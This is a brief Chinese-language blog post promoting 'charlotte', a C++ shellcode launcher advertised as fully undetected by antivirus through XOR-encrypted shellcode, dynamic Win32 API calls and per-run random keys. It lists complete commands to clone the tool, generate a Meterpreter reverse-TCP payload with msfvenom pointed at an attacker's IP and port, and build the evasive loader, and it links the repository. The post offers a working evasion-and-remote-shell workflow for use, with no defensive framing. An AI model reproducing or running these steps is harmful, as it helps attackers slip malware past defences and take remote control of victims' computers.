完全未被检测到的shellcode启动器
VSole2023-06-30 15:07:29
2021年5月13日:
c++ shellcode启动器,截至2021年5月13日,0/26完全未被检测到。 win32 api函数的动态调用 shellcode和函数名的异或加密 每次运行随机XOR键和变量 在KaliLinux上,只需'apt-get install mingw-w64*'就可以了!
2021年5月17日:
随机字符串长度和XOR键长度
使用
git clone存储库,生成命名为beacon.bin的shellcode文件,然后运行charlotte.py
注:使用msfvenom -p测试以及CobaltStrike原始格式Payload!
git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64* cd charlotte msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin python charlotte.py
下载地址
https://github.com/9emin1/charlotte
本作品采用《CC 协议》,转载必须注明作者和本文链接

VSole
网络安全专家